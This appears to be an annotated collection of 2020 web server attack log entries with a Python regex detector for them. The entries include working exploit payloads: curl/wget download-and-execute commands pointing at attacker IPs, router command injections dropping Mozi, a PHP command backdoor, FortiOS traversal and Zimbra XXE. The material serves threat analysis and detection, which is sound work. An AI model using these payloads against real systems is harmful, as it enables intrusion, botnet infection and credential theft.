Web Server Logs
2020
Below are log entries collected from web servers in 2020. Most entries are attack related, and we add details with our suspicions of what is being attempted. When the client sent the server's own IP address in the Host header, we write IP in its place rather than the actual address.
Unknown
GET /?a=fetch&content=<php>die(shell_exec("curl%2045.10.88.124/tf.sh|sh"))</php> 1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Other GET Requests: GET /index.php?a=fetch&content=<php>die(@md5(0))</php> 1.1
GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> 1.1
GET /?a=fetch&content=<php>die(shell_exec("wget%20-q%20-O%20-%2045.10.88.124/tf.sh|sh"))</php> 1.1
SHA1: a493860bb6feb4267e7df05f7d48ff564b89e76a (kinsing)
Detection: Unix.Malware.Kinsing-7812065-1
Notes: Unsure what application is targeted, possibly ThinkCMF. tf.sh is a shell script that, among other things, deletes logs, disables the firewall, SELinux and AppArmor, and kills other malware. It downloads kinsing, which appears to be a miner.
Unknown redlion
GET /portal/redlion 1.1
Host: IP
User-Agent: Mozilla/5.0 zgrab/0.x
Notes: Unsure what application is targeted.
Dasan GPON Home Routers
POST /GponForm/diag_Form?images/ 1.1
Host: 127.0.0.1
User-Agent: Hello, World
Post Data: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://41.86.5.50:50348/Mozi.m+-O+->/tmp/gpon80;sh+
SHA1: 292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21 (Mozi.m)
Detection: Linux/Mirai Variant
CVE: CVE-2018-10561
Notes: Payload is downloaded from attacking IP.
Fortinet FortiOS
GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession 1.1
Host: fqdn
User-Agent: Mozilla/5.0
CVE: CVE-2018-13379
Notes: If the device is vulnerable this can reveal usernames and passwords.
MVPower DVR
GET /shell?cd+/tmp;rm+-rf+*;wget+http://123.156.28.243:40034/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws 1.1
Host: IP
User-Agent: Hello, world
SHA1: 292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21 (Mozi.a)
Detection: Linux/Mirai Variant
Notes: Payload is downloaded from the attacking IP. The vulnerability may be in the JAWS web server, which could be used by other products.
Netgear Attack
GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://27.203.167.160:40373/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 1.0
SHA1: 292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21 (Mozi.m)
Detection: Linux/Mirai Variant
Notes: Dates to 2013; Netgear DGN firmware 1.1.00.48 is patched. Authentication bypass: if the URL contains currentsetting.htm, authentication checks are skipped. Payload is downloaded from the attacking IP.
PHPUnit eval-stdin.php
GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
CVE: CVE-2017-9841
Notes: Code execution. PHPUnit should not be present on a web server.
Proxy Attempt
GET http://google.com 1.1
Host: google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
RDP Connection Attempt
\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr
Notes: This is an RDP connection attempt to a web server.
ThinkCMF
GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> 1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Notes: Dates to 2019. RCE, can't find CVE.
ThinkPHP
GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP 1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
CVE: CVE-2019-09082
Notes: Dates to 2018. Authentication bypass issue. ThinkPHP 5.0.23 and 5.1.31 and newer are patched for this vulnerability.
Tomcat
GET /manager/text/list 1.1
Host: IP
User-Agent: Mozilla/5.0 zgrab/0.x
Notes: Looking for a Tomcat Manager interface exposed to the Internet. The list command returns the applications deployed in Tomcat.
Wordpress Plugin File Manager
GET /wp-content/plugins/wp-file-manager/readme.txt 1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Notes: Looking for wp-file-manager plugin installs.
Wordpress Plugin File Manager Exploit
POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php 1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Post data: <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
CVE: CVE-2020-25213
Notes: The POST was truncated; it was a multipart form. The payload, a PHP backdoor, was uploaded as k.php.
Wifi ONU
POST /boaform/admin/formLogin 1.1
Host: IP
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
Post Data: username=admin&psd=Feefifofum
Other GET Requests: GET /boaform/admin/formLogin?username=admin&psd=admin 1.0
Notes: Login attempts were made using both POST and GET. This appears to target Wifi ONU devices.
Zeroshell
GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22
CVE: CVE-2009-0545
Notes: Looks to be targeting devices running Zeroshell, a Linux-based router/firewall, using a bug from 2009. The IP hosting the payload was down, so it couldn't be retrieved.
Zimbra Collaboration Suite
POST /Autodiscover/Autodiscover.xml 1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Post Data: <!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
<Request>
<EMailAddress>aaaaa</EMailAddress>
<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
</Request>
</Autodiscover>
CVE: CVE-2019-9670
Notes: We believe this is an XXE injection attack against Zimbra. They would be trying to retrieve the LDAP password from /etc/passwd. There is a Metasploit exploit that chains this with CVE-2019-9621, an SSRF vulnerability, to eventually upload a JSP webshell.
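The entries above share a handful of request shapes: a PHP tag smuggled into a query parameter, a wget/curl download piped into sh, repeated ../ traversal, a probe for eval-stdin.php, the ThinkPHP invokefunction call, a Tomcat Manager probe, an absolute URL used as a forward-proxy request, and an XML body declaring an external entity. As an added example (not part of the original log collection, and not code from any of the products named), the following Python applies one regex rule per shape to URL-decoded request targets and POST bodies and runs it over constructed access-log lines. The rule names, the log regex, and the sample lines are our own; client and payload-host addresses in the samples use the RFC 5737 documentation ranges rather than the IPs recorded on this page.

```python
import re
from urllib.parse import unquote_plus

# Indicator rules derived from the request shapes recorded on this page.
# Each rule is (name, compiled regex); rules are applied to the URL-decoded
# request target and, when one is supplied, the decoded POST body.
RULES = [
    ("php-tag-in-query", re.compile(r"<php>|<\?php", re.I)),
    ("shell-download-exec",
     re.compile(r"\b(?:wget|curl)\b.*?(?:\|\s*sh\b|;\s*sh\b|\bchmod\b)", re.I | re.S)),
    ("path-traversal", re.compile(r"(?:\.\./){2,}")),
    ("phpunit-eval-stdin",
     re.compile(r"/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin\.php", re.I)),
    ("thinkphp-invokefunction",
     re.compile(r"invokefunction.*?call_user_func_array", re.I | re.S)),
    ("xxe-external-entity", re.compile(r"<!ENTITY\s+\S+\s+SYSTEM\b", re.I)),
    ("tomcat-manager-probe", re.compile(r"^/manager/(?:text|html)\b", re.I)),
    ("forward-proxy-request", re.compile(r"^https?://", re.I)),
]

# Combined log format: client ident user [timestamp] "METHOD target HTTP/x" status size ...
LOG_RX = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?" (?P<status>\d{3}) \S+'
)


def triage(target, body=""):
    """Return the names of all rules matched by one request.

    Target and body are percent-decoded once (with + as space) so that
    encoded payloads such as curl%20...|sh are inspected in decoded form.
    """
    haystacks = [unquote_plus(target)]
    if body:
        haystacks.append(unquote_plus(body))
    return [name for name, rx in RULES if any(rx.search(h) for h in haystacks)]


def scan_log(lines):
    """Parse access-log lines and return (client_ip, target, hits) for each flagged request."""
    flagged = []
    for line in lines:
        m = LOG_RX.match(line)
        if not m:
            continue  # not in combined log format; skip rather than guess
        hits = triage(m["target"])
        if hits:
            flagged.append((m["ip"], m["target"], hits))
    return flagged


# Constructed sample lines (not real traffic) modelled on the entries above.
SAMPLE_LOG = [
    r'192.0.2.10 - - [05/Mar/2020:10:00:01 +0000] "GET /?a=fetch&content=<php>die(shell_exec(%22curl%20198.51.100.7/tf.sh|sh%22))</php> HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    r'192.0.2.11 - - [05/Mar/2020:10:00:02 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://198.51.100.7/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 162 "-" "Hello, world"',
    r'192.0.2.12 - - [05/Mar/2020:10:00:03 +0000] "GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1" 404 162 "-" "Mozilla/5.0"',
    r'192.0.2.13 - - [05/Mar/2020:10:00:04 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 162 "-" "Mozilla/5.0"',
    r'192.0.2.14 - - [05/Mar/2020:10:00:05 +0000] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 162 "-" "Mozilla/5.0"',
    r'192.0.2.15 - - [05/Mar/2020:10:00:06 +0000] "GET /manager/text/list HTTP/1.1" 401 0 "-" "Mozilla/5.0 zgrab/0.x"',
    r'192.0.2.16 - - [05/Mar/2020:10:00:07 +0000] "GET http://google.com HTTP/1.1" 400 0 "-" "Mozilla/5.0"',
    r'192.0.2.17 - - [05/Mar/2020:10:00:08 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    r'192.0.2.18 - - [05/Mar/2020:10:00:09 +0000] "GET /search?q=how+to+use+curl HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

# Constructed POST bodies modelled on the GPON and Zimbra entries above.
GPON_BODY = "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://198.51.100.7/Mozi.m+-O+->/tmp/gpon80;sh+"
XXE_BODY = (
    '<!DOCTYPE xxe [<!ELEMENT name ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
    '<Autodiscover><Request><EMailAddress>aaaaa</EMailAddress>'
    '<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema></Request></Autodiscover>'
)

if __name__ == "__main__":
    for ip, target, hits in scan_log(SAMPLE_LOG):
        print(f"{ip:<12} {', '.join(hits):<24} {target[:60]}")
    print("GPON body:  ", triage("/GponForm/diag_Form?images/", GPON_BODY))
    print("Zimbra body:", triage("/Autodiscover/Autodiscover.xml", XXE_BODY))
```

The two benign sample lines, including the query that merely mentions curl, produce no hits, which is the point of requiring a pipe or chmod after the download tool rather than matching the tool name alone. Access logs do not record POST bodies, so the GPON and Zimbra shapes can only be checked where a WAF or reverse proxy captures the body; the triage function accepts one for that case.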